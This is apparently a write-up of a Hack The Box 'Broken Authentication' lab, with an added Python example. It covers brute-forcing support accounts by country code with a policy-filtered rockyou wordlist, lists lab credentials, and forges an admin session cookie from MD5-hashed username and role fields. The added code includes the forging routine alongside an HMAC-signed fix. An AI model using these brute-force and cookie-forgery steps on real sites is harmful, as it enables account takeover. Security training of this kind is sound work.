Broken Authentication

Skills Assessment - Hardest module for CBBH path

Register an account

Credentials:

123francis123:P@ssw0rd1P@ssw0rd123

If you try common passwords, they will be blocked by the password policy.

Password policy:

The password must start with a capital letter

The password must end with a digit

The password must contain at least one special char: $ # @

The password must be shorter than 20 characters

From the support page, we know there is a global account called support.

It also mentions that the other accounts remain unchanged and that we can continue to contact any department by adding the country code.

Let's try IDOR on the support account with a wordlist of country codes.

There is /messages.php, which can be used to brute-force different usernames via Intruder, since there is rate limiting on logins.

Country code wordlist

/home/francis/HTB/SecLists/Fuzzing/country-codes.txt

It will take some time to fuzz for the different support accounts based on country code.

Let's filter rockyou.txt to remove passwords that do not match the password policy:

grep '[[:upper:]]' rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$'

The filtered rockyou.txt password list can be used to brute-force the different support accounts.

After manual brute-forcing via the login page, the valid credentials are listed below.

support.cn:BisocaBuzau#20061985

support.it:Mustang#firebird1995

support.gr:Situngkir766H!011104

support.uk:TrillPrincessMentality#1

support.us:Mustang#firebird1995

From support.gr, get the session cookie and run ./dcode <session cookie> using Decodify:

./dcode NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D

Decoded from Base64 : 68c9260090620e5f471eaaeecb0bce59:434990c8a25d2be94863561ae98bd682

It seems the output above is in the format <md5 hash>:<md5 hash>.

Let's try to decode the MD5 hashes one by one.

The hashes decode to support.gr:support, i.e. the layout is username:role.

Now let's change username:role to admin privileges:

admin.gr:admin, with each part encoded as MD5:

echo -n 'admin.gr' | md5sum

041da04f12f5c3768bd0f9cb1efd5572

echo -n 'admin' | md5sum

21232f297a57a5a743894a0e4a801fc3

So the new cookie value is 041da04f12f5c3768bd0f9cb1efd5572:21232f297a57a5a743894a0e4a801fc3

Now let's use CyberChef to Base64-encode and then URL-encode it:

MDQxZGEwNGYxMmY1YzM3NjhiZDBmOWNiMWVmZDU1NzI6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D

Set the cookie via the browser developer tools to get the flag.
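As an added example (not part of the original writeup), the Python below reverses the observed cookie layout on the support.gr cookie captured above, shows that minting such a cookie needs no secret, and places beside it a signed variant of the kind a server should issue instead: the same username:role payload bound to a server-held key with HMAC-SHA256, so any edit to the role field fails verification. SERVER_KEY, the "|" separator between payload and tag, and the function names are assumptions of this example, not anything taken from the lab.

```python
import base64
import hashlib
import hmac
import secrets
from urllib.parse import quote, unquote

# Session cookie captured from the support.gr login in the writeup (URL-encoded Base64).
CAPTURED_COOKIE = ("NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6"
                   "NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def decode_session_cookie(cookie: str):
    """Reverse the observed format: URL-decode, Base64-decode, split on ':'."""
    raw = base64.b64decode(unquote(cookie)).decode()
    user_hash, role_hash = raw.split(":", 1)
    return user_hash, role_hash


def unsigned_cookie(username: str, role: str) -> str:
    """Rebuild a cookie in the observed md5(user):md5(role) layout.

    Nothing here depends on a server secret, which is why the role field
    is client-controlled: anyone who knows the layout can produce any value.
    """
    raw = f"{md5_hex(username)}:{md5_hex(role)}".encode()
    return quote(base64.b64encode(raw).decode())


# --- Hardened variant (assumption: the server keeps this key private) ---
SERVER_KEY = secrets.token_bytes(32)


def issue_signed_cookie(username: str, role: str, key: bytes = SERVER_KEY) -> str:
    """payload|HMAC-SHA256(payload), then Base64 + URL-encoded like the original."""
    payload = f"{username}:{role}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return quote(base64.b64encode(payload + b"|" + tag).decode())


def verify_signed_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return (username, role) only if the tag verifies; otherwise None."""
    try:
        raw = base64.b64decode(unquote(cookie))
        payload, tag = raw.rsplit(b"|", 1)
        expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
        # Constant-time comparison: no timing leak on how many bytes matched.
        if not hmac.compare_digest(tag, expected):
            return None
        username, role = payload.decode().split(":", 1)
    except ValueError:  # bad Base64, missing separator, bad UTF-8
        return None
    return username, role


def tamper_role(cookie: str, new_role: str) -> str:
    """Rewrite the role inside a signed cookie while keeping the old tag."""
    raw = base64.b64decode(unquote(cookie))
    payload, tag = raw.rsplit(b"|", 1)
    username = payload.decode().split(":", 1)[0]
    forged = f"{username}:{new_role}".encode() + b"|" + tag
    return quote(base64.b64encode(forged).decode())


if __name__ == "__main__":
    print(decode_session_cookie(CAPTURED_COOKIE))
    good = issue_signed_cookie("support.gr", "support")
    print(verify_signed_cookie(good))
    print(verify_signed_cookie(tamper_role(good, "admin")))
```

Even the signed form still carries the role claim to the client, so the stronger fix is an opaque random session identifier with the role looked up server-side; the HMAC version is shown because it is the smallest change to the lab's cookie format that makes the role field tamper-evident.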
